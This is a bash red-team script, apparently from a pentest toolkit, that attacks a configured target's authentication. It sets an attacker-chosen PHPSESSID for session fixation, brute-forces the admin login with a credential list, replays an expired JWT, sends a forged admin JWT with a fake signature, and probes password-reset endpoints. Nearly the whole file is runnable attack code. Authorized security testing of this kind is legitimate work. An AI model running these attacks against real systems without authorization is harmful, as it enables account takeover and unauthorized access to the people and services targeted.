#!/bin/bash # Red-team: Auth/session security — session fixation, token replay, brute force, MFA bypass SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" source "$SCRIPT_DIR/../config.sh" OUT="$OUT/auth_session" mkdir -p "$OUT" echo '=== AUTH & SESSION RED-TEAM ===' | tee "$OUT/summary.txt" # Session fixation attempt — set our own session ID echo '--- Session Fixation ---' | tee -a "$OUT/summary.txt" resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -H 'Cookie: PHPSESSID=ATTACKER_CONTROLLED_SESSION_12345' "$TARGET/admin/") echo "[$resp] Preset PHPSESSID to attacker value" | tee -a "$OUT/summary.txt" # Capture session cookie after login attempt and check if same ID is kept echo '' | tee -a "$OUT/summary.txt" echo '--- Admin Brute Force (top credentials) ---' | tee -a "$OUT/summary.txt" CREDS=("${BRUTE_CREDS[@]}") for cred in "${CREDS[@]}"; do user="${cred%%:*}" pass="${cred##*:}" resp=$(curl -sk -c /tmp/jar.txt -o /tmp/login_body.txt -w '%{http_code}' --max-time 10 -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d "username=$user&password=$pass&submit=Login" "$TARGET/admin/") # A 302 redirect away from /admin/ after POST = successful login body_hint=$(grep -i 'invalid\|wrong\|error\|failed\|logout\|dashboard' /tmp/login_body.txt 2>/dev/null | head -1 | cut -c1-60) echo "[$resp] $user:$pass | $body_hint" | tee -a "$OUT/summary.txt" done # Token replay — capture a 401 response token if any is revealed echo '' | tee -a "$OUT/summary.txt" echo '--- JWT Token Replay & Manipulation ---' | tee -a "$OUT/summary.txt" # Expired-looking token (exp in past) EXPIRED_JWT='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJ0ZXN0IiwiZXhwIjoxNjAwMDAwMDAwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c' resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -H "Authorization: Bearer $EXPIRED_JWT" -H 'Content-Type: application/json' -d '{"data":"test"}' "$API_TARGET/encrypt") echo "[$resp] Expired JWT" | tee -a "$OUT/summary.txt" # Same-signature different payload (alg:HS256 with weak secret guess) WEAK_JWT='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImV4cCI6OTk5OTk5OTk5OX0.YmFkc2lnbmF0dXJl' resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 -H "Authorization: Bearer $WEAK_JWT" -H 'Content-Type: application/json' -d '{"data":"test"}' "$API_TARGET/encrypt") echo "[$resp] Crafted admin JWT (fake sig)" | tee -a "$OUT/summary.txt" # Password reset flow (check if endpoint exposed) echo '' | tee -a "$OUT/summary.txt" echo '--- Password Reset Flow ---' | tee -a "$OUT/summary.txt" for path in '/reset-password' '/forgot-password' '/password-reset' '/api/reset' '/admin/reset'; do resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 8 "$TARGET$path") echo "[$resp] $path" | tee -a "$OUT/summary.txt" done # Cookie security flags check echo '' | tee -a "$OUT/summary.txt" echo '--- Cookie Security Flags ---' | tee -a "$OUT/summary.txt" curl -sk -I --max-time 10 -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=admin&password=test' "$TARGET/admin/" | grep -i 'set-cookie' | tee -a "$OUT/summary.txt" cat "$OUT/summary.txt"